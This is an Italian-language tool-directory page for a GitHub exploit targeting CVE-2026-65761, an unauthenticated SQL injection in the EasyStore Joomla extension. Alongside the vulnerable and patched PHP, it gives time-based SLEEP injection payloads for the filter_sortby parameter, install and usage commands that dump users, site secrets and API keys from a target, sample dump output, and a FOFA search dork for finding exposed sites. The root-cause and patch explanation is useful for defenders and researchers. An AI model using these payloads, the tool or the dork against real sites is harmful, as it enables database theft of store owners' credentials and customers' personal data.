Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-65761 — EasyStore Joomla: iniezione SQL pre-autenticazione tramite la direzione di filter_sortby (CVE-2026-65761, CVSS 9.3) | Kitploit
Strumenti/GitHubGitHub/shinthink/cve-2026-65761
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubshinthink/cve-2026-65761

CVE-2026-65761

EasyStore Joomla: iniezione SQL pre-autenticazione tramite la direzione di filter_sortby (CVE-2026-65761, CVSS 9.3)

Vedi Repository
1 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-65761 — Iniezione SQL pre-autenticazione in EasyStore Joomla

Direzione filter_sortby → Iniezione ORDER BY → Lettura completa del DB


Panoramica

CVE-2026-65761 (CVSS 9.3 Critico) è un'iniezione SQL non autenticata in EasyStore per Joomla di JoomShaper, che interessa le versioni ≤ 2.0.1.

Il parametro filter_sortby dell'elenco prodotti viene suddiviso in una colonna e una direzione. Mentre la colonna viene validata tramite una lista consentita, la senza alcuna restrizione ASC/DESC — consentendo a un visitatore anonimo di eseguire un'iniezione SQL arbitraria.

direzione viene concatenata direttamente nella clausola SQL ORDER BY

Un attaccante non autenticato può leggere l'intero database Joomla: account utente, hash delle password, dati di sessione, segreti del sito, chiavi API e tutti i dati personali dei clienti (nomi, email, indirizzi, numeri di telefono, cronologia acquisti).

CVECVE-2026-65761
CVSS9.3 Critico
InteressateEasyStore ≤ 2.0.1
CorrettaEasyStore 2.0.2
TipoSQL Injection (CWE-89)
AutenticazioneNon richiesta
ScopertaPhil Taylor (mySites.guru) — Luglio 2026

Meccanismo della vulnerabilità

Causa principale

FilterHelper.php:741 restituisce la direzione di ordinamento senza alcun controllo della lista consentita ASC/DESC:

root@kitploit:~
// Vulnerable (EasyStore 2.0.1)
// FilterHelper.php:741
return [$orderArray[0], strtoupper($orderArray[1])];
//                      ^^^^^^^^^ No validation — raw value after uppercase

ProductsModel.php:932 concatena la direzione direttamente nell'SQL:

root@kitploit:~
// ProductsModel.php:932
$query->order($column . ' ' . $direction);
//                        ^^^^^^^^^ Raw SQL concatenation

Le liste di brand e collezioni gemelle avevano liste consentite appropriate per la direzione. L'elenco prodotti no.

Patch (EasyStore 2.0.2)

root@kitploit:~
// Fixed — FilterHelper.php:741-742
$direction = strtoupper($orderArray[1]);
return [$orderArray[0], in_array($direction, ['ASC', 'DESC']) ? $direction : 'ASC'];
//                      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Allow-list check

// Fixed — ProductsModel.php:918-920 (second validation added)
if (!in_array(strtoupper($direction), ['ASC', 'DESC'])) {
    $direction = 'DESC';
}

Flusso dell'attacco

root@kitploit:~
1. Attacker crafts: filter_sortby=price-ASC,(SELECT SLEEP(5))
   └─ splits to: column=price, direction=ASC,(SELECT SLEEP(5))

2. Column "price" passes allow-list check ✅
   └─ ['ordering','featured','best_selling','title','price','created']

3. Direction "ASC,(SELECT SLEEP(5))" passes strtoupper()
   └─ No ASC/DESC validation in vulnerable version

4. SQL constructed:
   ORDER BY min_price ASC,(SELECT SLEEP(5))
   └─ Time-based confirmation: 5 second delay

5. Attacker extracts full database via blind SQLi

Prerequisiti

RequisitoDettagli
EasyStore ≤ 2.0.1Versione vulnerabile installata
Elenco prodotti accessibileindex.php?option=com_easystore&view=products
Nessuna autenticazioneFunziona in modo anonimo
MySQL/MariaDBEstrazione basata sul tempo tramite SLEEP()

Installazione

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-65761.git
cd CVE-2026-65761
# No dependencies required — Python stdlib only

Utilizzo

root@kitploit:~
# Check vulnerability (non-destructive)
python3 cve_2026_65761.py --url https://target.com --check

# Dump Joomla users (usernames, emails, names)
python3 cve_2026_65761.py --url https://target.com --dump-users

# Full dump (users + site secret + EasyStore config + API keys)
python3 cve_2026_65761.py --url https://target.com --dump-joomla

Output

root@kitploit:~
+=================================================================+
|  CVE-2026-65761 — EasyStore Joomla Pre-Auth SQLi Exploit        |
+=================================================================+
  Target :  https://shop.target.com
  Plugin :  EasyStore ≤ 2.0.1 | Payload: filter_sortby=col-ASC,INJECTION

[STEP 1] Verifying SQL injection (time-based)
  [*] SLEEP(5) delay: 5.2s
  [+] SQLi confirmed (5.2s)

[STEP 2] Database fingerprint
    [Version] 10.11.14-MariaDB
    [Database] joomla_db
    [User]    joomla_user@localhost
    [Prefix]  jos_
  [+] Version : 10.11.14-MariaDB
  [+] Database: joomla_db
  [+] User    : joomla_user@localhost
  [+] Prefix  : jos_

[STEP 3] Dumping users
  [+] Users: 15

  USERNAME                  EMAIL                               NAME
  ─────────────────────     ───────────────────────────────     ──────────
  admin                     [email protected]                      Super User
  manager                   [email protected]                    Store Manager

[STEP 4] Dumping sensitive configuration
    [Secret] abc123def456...
    [EasyStore] {"paypal_email":"[email protected]"...
  [+] Secret: abc123def456...
  [+] EasyStore: {"paypal_email":"[email protected]"...
  [+]   paypal_email: [email protected]

Requests: 1847

Dettagli tecnici

Percorso del codice vulnerabile

FileRigaProblema
site/src/Helper/FilterHelper.php741Restituisce la direzione senza lista consentita — solo strtoupper()
site/src/Model/ProductsModel.php932Concatena $direction direttamente nella clausola ORDER BY

Parametro di iniezione

root@kitploit:~
filter_sortby = <column>-<direction>

Valid columns (allow-list passes):
  ordering, featured, best_selling, title, price, created

Direction (no validation):
  Injected directly after strtoupper()
  → ASC,(SELECT SLEEP(5))
  → ASC,(SELECT IF((condition),SLEEP(2),0))

Vulnerabilità aggiuntive in EasyStore 2.0.1

CVETipoCVSS
CVE-2026-65759Falsificazione ordini / manipolazione dei pagamenti8.7
CVE-2026-65760IDOR delle fatture (esposizione dei dati tra clienti)9.2
CVE-2026-65761Iniezione SQL (questo exploit)9.3

FOFA Dork

root@kitploit:~
body="com_easystore" && body="filter_sortby"

Riferimenti

  • mySites.guru — Divulgazione originale
  • JoomShaper — EasyStore Free
  • VulDB — CVE-2026-65761

Avvertenza

Solo per test di sicurezza autorizzati e ricerca educativa. Gli autori non si assumono alcuna responsabilità per un uso improprio.

Scarica lo strumento